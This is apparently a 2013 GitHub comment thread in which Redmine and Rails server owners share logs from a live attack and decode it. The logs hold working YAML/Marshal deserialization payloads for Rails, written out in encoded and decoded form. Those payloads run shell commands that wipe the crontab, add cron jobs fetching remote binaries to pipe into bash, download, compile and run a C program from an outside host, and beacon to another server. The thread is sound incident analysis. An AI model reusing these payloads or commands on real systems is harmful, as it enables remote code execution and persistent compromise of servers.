17630: 88.198.20.247 - - [24/May/2013:21:14:04 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgGpc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycpCgY6BkVUOgxAbWV0aG9kOgtyZXN1bHQ%253D%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 3948 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17631: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "POST / HTTP/1.1" 302 706 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17632: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3601 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17633: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "POST / HTTP/1.1" 302 832 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17634: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3691 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17635 89.100.221.85 - - [24/May/2013:21:40:43 +0200] "-" 400 0 "-" "-" "-"
17636 89.100.221.85 - - [24/May/2013:21:44:10 +0200] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
.....
17836: 88.198.20.247 - - [24/May/2013:23:10:01 +0200] "POST / HTTP/1.1" 302 1396 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
17837: 88.198.20.247 - - [24/May/2013:23:10:02 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgI3AXN5c3RlbSgnY3JvbnRhYiAtcjsgZWNobyAiMSAqICogKiAqIHdnZXQgLU8gLSBjb2xrb2xkdWxkLmNvbS9jbWQxfGJhc2g7d2dldCAtTyAtIGxvY2hqb2wuY29tL2NtZDJ8YmFzaDt3Z2V0ICAtTyAtIGRkb3MuY2F0LmNvbS9jbWQzfGJhc2g7Inxjcm9udGFiIC07d2dldCBodHRwOi8vODguMTk4LjIwLjI0Ny9rLmMgLU8gL3RtcC9rLmM7IGdjYyAtbyAvdG1wL2sgL3RtcC9rLmM7IGNobW9kICt4IC90bXAvazsgL3RtcC9rfHx3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2sgLU8gL3RtcC9rICYmIGNobW9kICt4IC90bXAvayAmJiAvdG1wL2snKQoKBjoGRVQ6DEBtZXRob2Q6C3Jlc3VsdA%253D%253D%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 4142 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
17838: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "POST / HTTP/1.1" 302 894 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
17839: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3790 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
17840: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "POST / HTTP/1.1" 302 1020 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
17841: 88.198.20.247 - - [24/May/2013:23:10:04 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3880 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
17842 80.108.82.117 - - [25/May/2013:00:01:49 +0200] "f\xA9\xA4\xFAo\x7F\xD0\xD6\xCB\x05\x83T\x82\xE7\x18\xDF\xD9p\x94\x80\xA6FY89g;\xDA}\xFDE9A\xF1P|\xBB\xF1\xA9\xFD\xE0\xDB\xCC_\x9A\x9C1\x89t\xADj\x10\xED\x9B\xF4\x8E*\xB8\x941\xF5+\x0B.&\xC5\x97,Q\xB8\x04\x85" 400 166 "-" "-" "-"
Here (I don't know how..) he compiled the C program. (for me "k.c" & "sh.py")
And he tries to access my root account.
nginx/error.log
1848 /home/my_login/.rvm/gems/ruby-1.9.3-p327/gems/activesupport-3.2.9/lib/active_support/dependencies.rb:251:in `block in require': iconv will be deprecated in the future, use String#encode instead.
1849: --2013-05-24 21:14:01-- http://88.198.20.247/k.c
1850: Connecting to 88.198.20.247:80... connected.
1851 HTTP request sent, awaiting response... 200 OK
1852 Length: 18854 (18K) [text/x-csrc]
....
1858
1859 /tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
1860: Lockfile found. Exiting.--2013-05-24 21:14:04-- http://88.198.20.247/k.c
1861: Connecting to 88.198.20.247:80... connected.
1862 HTTP request sent, awaiting response... 200 OK
1863 Length: 18854 (18K) [text/x-csrc]
....
1878 [ pid=856 thr=3065412416 file=ext/nginx/HelperAgent.cpp:923 time=2013-05-24 21:49:42.117 ]: Couldn't forward the HTTP response back to the HTTP client: It seems the user clicked on the 'Stop' button in his browser.
1879 [ pid=856 thr=3066215232 file=ext/nginx/HelperAgent.cpp:923 time=2013-05-24 21:50:29.5 ]: Couldn't forward the HTTP response back to the HTTP client: It seems the user clicked on the 'Stop' button in his browser.
1880: --2013-05-24 23:10:00-- http://88.198.20.247/k.c
1881: Connecting to 88.198.20.247:80... connected.
1882 HTTP request sent, awaiting response... 200 OK
1883 Length: 18854 (18K) [text/x-csrc]
....
1889
1890 /tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
1891: Lockfile found. Exiting.--2013-05-24 23:10:02-- http://88.198.20.247/k.c
1892: Connecting to 88.198.20.247:80... connected.
1893 HTTP request sent, awaiting response... 200 OK
1894 Length: 18854 (18K) [text/x-csrc]
1906 HTTP request sent, awaiting response... 200 OK
1907 Length: 2252 (2.2K) [text/plain]
1908: Saving to: `/tmp/sh.py'
1909
1910 0K .. 100% 7.73M=0s
1911
1912: 2013-05-25 00:36:30 (7.73 MB/s) - `/tmp/sh.py' saved [2252/2252]
1913
1914 sudo: no tty present and no askpass program specified
2013-05-24 23:10:02 (218 KB/s) - `/tmp/k.c' saved [18854/18854]
/tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
Lockfile found. Exiting.Lockfile found. Exiting.sh: 1: Syntax error: "(" unexpected
--2013-05-25 00:36:29-- http://starfall.cu.cc/chips.txt
Resolving starfall.cu.cc (starfall.cu.cc)... 37.221.166.32
Connecting to starfall.cu.cc (starfall.cu.cc)|37.221.166.32|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2252 (2.2K) [text/plain]
Saving to: `/tmp/sh.py'
0K .. 100% 7.73M=0s
2013-05-25 00:36:30 (7.73 MB/s) - `/tmp/sh.py' saved [2252/2252]
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
telnet: Unable to connect to remote host: Connection refused
telnet: Unable to connect to remote host: Connection refused
Connection closed by foreign host.
telnet: Unable to connect to remote host: Connection refused
Connection closed by foreign host.
Connection closed by foreign host.
Connection closed by foreign host.
/home/remy/.rvm/gems/ruby-1.9.3-p327/gems/activesupport-3.2.9/lib/active_support/dependencies.rb:251:in `block in require': iconv will be deprecated in the future, use String#encode instead.
I saw the "k.c" and i have the impression, he uses irc server... in "cvv4you.ru" & "188.190.124.120" -> channel '#rails'
He runs the program with a fake name "- bash" I saw that in the process list with htop
I think we have to warm all RoR developers...
Netmisa
commented
May 26, 2013
|
Hi, Ok that's why I asked if one of you have redmine. Because I found interesting logs. I think he uses "/login?back_url=" nginx/access.log (My redmine) Here (I don't know how..) he compiled the C program. (for me "k.c" & "sh.py") nginx/error.log I saw the "k.c" and i have the impression, he uses irc server... in "cvv4you.ru" & "188.190.124.120" -> channel '#rails' I think we have to warm all RoR developers... |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
bu2
May 26, 2013
Salut Remy,
Thanks for putting your log because I found something really interesting in the GET /login?back_url= request that you pointed out:
The 'back_url' is URL encodded twice:
$ irb
1.9.3p392 :002 > s = '/login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A'
1.9.3p392 :004 > CGI.unescape CGI.unescape s
=> "/login?back_url=http://82.239.203.55/?id=\n---\n!ruby/object:Gem::Requirement\nrequirements:\n - !ruby/object:Rack::Session::Abstract::SessionHash\n env:\n HTTP_COOKIE: "a=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0"\n by: !ruby/object:Rack::Session::Cookie\n coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}\n key: a\n secrets: []\n exists: true\n"
Then the 'HTTP_COOKIE' is base64 blob :
$ base64 -d <(echo BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0)
o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy:@instanceoERB�: @srcI"��system('crontab -r')
system('(crontab -l ; echo "1 * * * * wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k") | crontab -')
system('wget -O /dev/null 188.190.124.120/req/log.php')
�:�ET:
@method:
resu
And so we can see that with this specially crafted request, the bad guy is able to run Ruby code which erase user-level crontab replacing by its own crontab.
I don't know exactely how it work, it might me related to rack security issue disclosed earlier this year (or perhaps undisclosed vulnerability...).
Thanks again for the log!
Regards.
bu2
commented
May 26, 2013
|
Salut Remy, Thanks for putting your log because I found something really interesting in the GET /login?back_url= request that you pointed out: The 'back_url' is URL encodded twice: $ irb 1.9.3p392 :004 > CGI.unescape CGI.unescape s Then the 'HTTP_COOKIE' is base64 blob : $ base64 -d <(echo BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0) And so we can see that with this specially crafted request, the bad guy is able to run Ruby code which erase user-level crontab replacing by its own crontab. I don't know exactely how it work, it might me related to rack security issue disclosed earlier this year (or perhaps undisclosed vulnerability...). Thanks again for the log! Regards. |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Netmisa
commented
May 26, 2013
|
Hello, It's pleasure, as we know now what it is about. :) Regards |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Leglaw
May 26, 2013
In my case it was PhpMyAdmin. 92.37.71.185 started probing my server starting about 10 hours ago.
Leglaw
commented
May 26, 2013
|
In my case it was PhpMyAdmin. 92.37.71.185 started probing my server starting about 10 hours ago. |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
marutosi
May 27, 2013
What version is your Redmine?
Redmine 2.3.1 uses Rails 3.2.13.
http://www.redmine.org/projects/redmine/repository/entry/tags/2.3.1/Gemfile#L3
marutosi
commented
May 27, 2013
|
What version is your Redmine? |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
marutosi
May 27, 2013
Redmine provides Security Advisories.
http://www.redmine.org/projects/redmine/wiki/Security_Advisories
Did you check it?
marutosi
commented
May 27, 2013
|
Redmine provides Security Advisories. |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Netmisa
May 27, 2013
My version is 2.2.
No I'm not checking that before, I should have... :/
I still did ticket on redmine.org (http://www.redmine.org/issues/14152).
@Leglaw : What is your PhPMyAdmin version ?
Netmisa
commented
May 27, 2013
|
My version is 2.2. @Leglaw : What is your PhPMyAdmin version ? |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
marutosi
commented
May 27, 2013
|
2.2.x? |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
bu2
May 27, 2013
Regarding me I am on Rails 3.2.8 with custom application.
I have spotted 3 IPs which were sending malicious request to one of our server:
88.198.20.247
95.138.186.181
188.190.126.105
The malicious requests are messing with YAML parameters and Session Cookie.
Here is some extracts of the log with malicious request:
from 88.198.20.247:
Started GET "/" for 88.198.20.247 at 2013-05-24 12:50:17 +0000
Processing by PagesController#show as HTML
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.8ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (2.4ms)
Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:14 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (6.4ms)
Rendered layouts/_social_links.html.erb (2.8ms)
Rendered layouts/_messages.html.haml (3.6ms)
Rendered layouts/_header.html.erb (1.7ms)
Rendered layouts/_menu.html.erb (0.9ms)
Rendered layouts/_my_favs.html.haml (4.5ms)
Rendered layouts/_ride_request_form.html.erb (15.2ms)
Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:15 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ==].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.2ms)
Rendered layouts/_head.html.erb (6.2ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.8ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (4.5ms)
Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:16 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.6ms)
Rendered layouts/_head.html.erb (4.3ms)
Rendered layouts/_social_links.html.erb (1.2ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (2.9ms)
Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:30 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (91.0ms)
Rendered layouts/_head.html.erb (7.8ms)
Rendered layouts/_social_links.html.erb (3.1ms)
Rendered layouts/_messages.html.haml (3.9ms)
Rendered layouts/_header.html.erb (1.5ms)
Rendered layouts/_menu.html.erb (0.5ms)
Rendered layouts/_my_favs.html.haml (4.4ms)
Rendered layouts/_ride_request_form.html.erb (14.3ms)
Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:33 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.5ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (3.7ms)
Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:34 +0000
Processing by PagesController#show as /
